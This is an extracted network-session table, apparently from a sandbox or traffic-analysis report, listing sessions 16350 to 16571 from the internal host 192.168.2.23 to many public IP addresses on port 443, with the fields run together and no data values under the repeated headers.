                                            16350192.168.2.235246090.25.199.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16351192.168.2.235767679.142.82.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16352192.168.2.2355334182.109.154.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16353192.168.2.235360645.1.119.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16354192.168.2.233542881.230.212.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16355192.168.2.234531283.248.241.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16356192.168.2.235129048.105.139.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16357192.168.2.2338796200.170.203.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16358192.168.2.2346886115.35.5.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16359192.168.2.2347460162.160.103.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16360192.168.2.235787290.174.37.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16361192.168.2.235428613.143.230.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16362192.168.2.234286844.54.182.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16363192.168.2.236080040.56.229.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16364192.168.2.2347278128.131.86.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16365192.168.2.2338802107.81.198.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16366192.168.2.23413682.137.141.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16367192.168.2.2359630173.29.0.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16368192.168.2.2335028102.203.169.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16369192.168.2.2335786150.120.111.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16370192.168.2.235542041.44.175.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16371192.168.2.2344404148.101.153.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16372192.168.2.2333614170.254.19.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16373192.168.2.2352550129.167.131.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16374192.168.2.233829673.236.91.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16375192.168.2.235099487.159.41.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16376192.168.2.2348820142.11.217.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16377192.168.2.2356986134.101.162.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16378192.168.2.234699265.239.6.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16379192.168.2.234390858.51.187.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16380192.168.2.2355950216.195.107.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16381192.168.2.2333246138.135.226.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16382192.168.2.2349958185.61.23.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16383192.168.2.235200612.35.119.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16384192.168.2.2357338153.164.201.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16385192.168.2.2341180123.136.78.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16386192.168.2.2337510210.27.36.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16387192.168.2.235764092.166.180.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16388192.168.2.2357846223.223.48.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16389192.168.2.2347062147.138.228.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16390192.168.2.2359940143.172.64.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16391192.168.2.2335982148.188.244.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16392192.168.2.235046032.239.161.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16393192.168.2.2337338192.87.165.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16394192.168.2.233869240.68.220.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16395192.168.2.2349536105.52.153.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16396192.168.2.2343218194.98.172.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16397192.168.2.235431869.119.146.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16398192.168.2.233360464.2.250.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16399192.168.2.235675671.182.249.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16400192.168.2.235171217.170.245.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16401192.168.2.2335240105.98.121.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16402192.168.2.235443081.59.78.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16403192.168.2.235663077.174.52.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16404192.168.2.2349588134.57.43.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16405192.168.2.2341916161.112.64.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16406192.168.2.2335226110.126.225.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16407192.168.2.2355812182.23.66.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16408192.168.2.2359936130.138.174.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16409192.168.2.2357364223.170.126.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16410192.168.2.2346784194.157.222.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16411192.168.2.2358512196.87.215.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16412192.168.2.2339256135.184.5.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16413192.168.2.2344318128.243.165.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16414192.168.2.2347446199.217.17.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16415192.168.2.234362458.138.201.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16416192.168.2.2358514163.176.105.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16417192.168.2.23391805.200.93.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16418192.168.2.235070067.34.243.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16419192.168.2.2347920200.107.7.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16420192.168.2.234278223.211.18.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16421192.168.2.2351914184.47.165.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16422192.168.2.234322876.76.99.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16423192.168.2.235016881.208.45.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16424192.168.2.2340982178.252.121.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16425192.168.2.2334106111.191.90.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16426192.168.2.2344420201.94.183.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16427192.168.2.2348058111.103.36.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16428192.168.2.2356636146.7.9.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16429192.168.2.234833423.58.74.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16430192.168.2.2344500200.8.158.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16431192.168.2.2345368168.156.88.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16432192.168.2.233556653.11.46.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16433192.168.2.235026818.37.182.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16434192.168.2.2358346162.216.142.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16435192.168.2.2346496142.133.39.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16436192.168.2.2335868220.79.141.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16437192.168.2.2339992194.158.11.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16438192.168.2.2334182203.135.124.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16439192.168.2.2333460206.194.48.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16440192.168.2.2353410102.202.61.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16441192.168.2.2353448180.137.195.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16442192.168.2.234117644.218.9.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16443192.168.2.2359770216.156.205.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16444192.168.2.234273636.201.59.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16445192.168.2.2337480137.150.184.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16446192.168.2.2350374170.38.165.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16447192.168.2.2334364197.108.112.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16448192.168.2.2352598199.91.200.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16449192.168.2.235640466.143.5.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16450192.168.2.2332956145.110.46.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16451192.168.2.23441048.46.42.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16452192.168.2.234248892.38.131.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16453192.168.2.2334704120.195.151.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16454192.168.2.234277274.140.148.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16455192.168.2.2358734154.84.98.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16456192.168.2.234785212.96.156.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16457192.168.2.235901218.195.34.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16458192.168.2.235118251.130.34.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16459192.168.2.235150645.186.147.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16460192.168.2.234918213.9.122.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16461192.168.2.2339664137.133.165.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16462192.168.2.2342588210.96.217.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16463192.168.2.2343162160.174.111.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16464192.168.2.2350390120.245.216.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16465192.168.2.234778047.103.108.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16466192.168.2.2360610139.161.151.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16467192.168.2.234803232.45.89.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16468192.168.2.235771891.66.217.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16469192.168.2.233299254.200.121.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16470192.168.2.2333704196.251.193.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16471192.168.2.2332806187.52.26.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16472192.168.2.2339204124.108.212.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16473192.168.2.2335158210.140.1.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16474192.168.2.2349560176.161.201.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16475192.168.2.2346068138.75.78.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16476192.168.2.2348140210.215.36.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16477192.168.2.2346388162.109.133.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16478192.168.2.2347714123.130.52.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16479192.168.2.2342294193.202.116.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16480192.168.2.235359059.208.238.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16481192.168.2.2334448199.121.111.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16482192.168.2.2343122212.35.71.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16483192.168.2.234675277.43.40.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16484192.168.2.2353362223.0.214.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16485192.168.2.2347806124.25.6.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16486192.168.2.2358450139.98.41.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16487192.168.2.2341770108.149.107.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16488192.168.2.2346720216.114.247.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16489192.168.2.236048277.26.152.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16490192.168.2.2356960222.87.82.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16491192.168.2.2334476149.176.180.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16492192.168.2.2352130197.24.73.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16493192.168.2.2345894189.26.57.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16494192.168.2.2356246126.192.19.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16495192.168.2.2342380157.167.24.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16496192.168.2.2360750143.0.249.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16497192.168.2.2351528116.196.219.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16498192.168.2.2341024212.36.160.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16499192.168.2.2338074175.16.186.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16500192.168.2.233728445.173.234.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16501192.168.2.235050084.21.235.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16502192.168.2.2333202210.254.207.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16503192.168.2.236013070.120.77.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16504192.168.2.236044882.96.173.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16505192.168.2.233678613.211.219.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16506192.168.2.236056823.39.111.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16507192.168.2.234142263.247.134.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16508192.168.2.2353478199.116.249.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16509192.168.2.235481089.61.219.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16510192.168.2.2346774109.195.90.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16511192.168.2.234391867.111.187.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16512192.168.2.2333938110.98.249.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16513192.168.2.2355182130.202.121.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16514192.168.2.2356310210.225.81.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16515192.168.2.2336720129.87.246.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16516192.168.2.233471057.122.222.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16517192.168.2.233465813.154.20.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16518192.168.2.2338872123.56.34.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16519192.168.2.2335508150.16.160.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16520192.168.2.235707480.199.111.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16521192.168.2.235239654.43.115.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16522192.168.2.2339072176.89.62.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16523192.168.2.235417872.15.213.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16524192.168.2.2337124136.99.18.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16525192.168.2.233287247.10.63.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16526192.168.2.234562051.101.154.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16527192.168.2.2349814125.148.177.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16528192.168.2.235682857.244.32.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16529192.168.2.2342852199.254.242.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16530192.168.2.2340656135.242.153.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16531192.168.2.233285623.238.252.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16532192.168.2.235262024.248.108.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16533192.168.2.2342204146.189.197.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16534192.168.2.233882876.128.93.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16535192.168.2.2356392192.30.141.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16536192.168.2.234511865.134.106.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16537192.168.2.234276271.88.148.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16538192.168.2.235013627.36.37.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16539192.168.2.234694876.33.176.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16540192.168.2.2333314155.75.38.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16541192.168.2.234534250.69.211.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16542192.168.2.235566841.44.123.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16543192.168.2.2360134180.107.100.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16544192.168.2.2354266193.119.136.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16545192.168.2.2358732201.134.32.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16546192.168.2.2334818212.202.113.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16547192.168.2.2345054183.30.21.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16548192.168.2.2359422161.164.33.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16549192.168.2.2351722147.102.53.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16550192.168.2.235105254.141.158.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16551192.168.2.2338492222.176.128.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16552192.168.2.2333748132.47.231.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16553192.168.2.2344848151.54.67.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16554192.168.2.2343336205.210.26.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16555192.168.2.233720872.186.64.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16556192.168.2.2358810138.175.9.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16557192.168.2.234990876.179.193.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16558192.168.2.235462245.22.132.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16559192.168.2.235540420.225.242.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16560192.168.2.2352678197.107.159.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16561192.168.2.2354434204.54.234.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16562192.168.2.2359648115.32.27.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16563192.168.2.234566667.114.21.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16564192.168.2.233969432.98.20.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16565192.168.2.234236239.189.200.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16566192.168.2.2342114156.200.179.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16567192.168.2.233823643.0.209.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16568192.168.2.233380445.38.92.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16569192.168.2.234249619.166.158.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16570192.168.2.2348668151.126.6.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16571192.168.2.2348482190.153.151.235443
                                            TimestampBytes transferredDirectionData


